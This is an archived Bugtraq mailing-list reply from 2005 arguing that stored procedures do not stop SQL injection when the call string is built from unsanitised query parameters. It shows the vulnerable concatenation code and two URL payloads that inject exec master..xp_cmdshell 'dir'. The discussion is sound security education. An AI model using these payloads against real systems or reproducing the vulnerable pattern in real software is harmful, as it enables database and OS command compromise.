Bugtraqmailing list archives
RE: Paper: SQL Injection Attacks by Example
From: "David Litchfield" <davidl () ngssoftware com>
Date: Wed, 5 Jan 2005 21:09:06 -0000
David,Actually, to nitpick your comment a bit, stored procedures usually have
typed input variables:
create procedure foo ( a int, b varchar(20) ) as ...
This has no bearing on the issue.If from the code of the app I perform something likestrSQL = "exec foo(" & request.querystring("a") & "," &request.querystring("b") & ")"Conn.execute(strSQL)then I can either set a in the query string to?a=1,'foo');exec+master..xp_cmdshell+'dir'--&b=fooOr alternatively I can set b in the query string to?a=1&b=foo');exec+master..xmp_cmdshell+'dir'--Either way I'm using a stored procedure and I can inject into the app.Cheers,DavidCurrent thread:
- Paper: SQL Injection Attacks by ExampleSteve Friedl (Jan 05)
- RE: Paper: SQL Injection Attacks by ExampleDavid Litchfield (Jan 05)
- <Possible follow-ups>
- RE: Paper: SQL Injection Attacks by ExampleScovetta, Michael V (Jan 05)
- Re: Paper: SQL Injection Attacks by ExampleChip Andrews (Jan 05)
- Re: Paper: SQL Injection Attacks by ExampleCory Foy (Jan 05)
- RE: Paper: SQL Injection Attacks by ExampleDavid Litchfield (Jan 05)
- RE: Paper: SQL Injection Attacks by ExampleMichael Silk (Jan 05)
- RE: Paper: SQL Injection Attacks by ExampleScovetta, Michael V (Jan 05)
- RE: Paper: SQL Injection Attacks by ExampleSergey Chernyshev (Jan 06)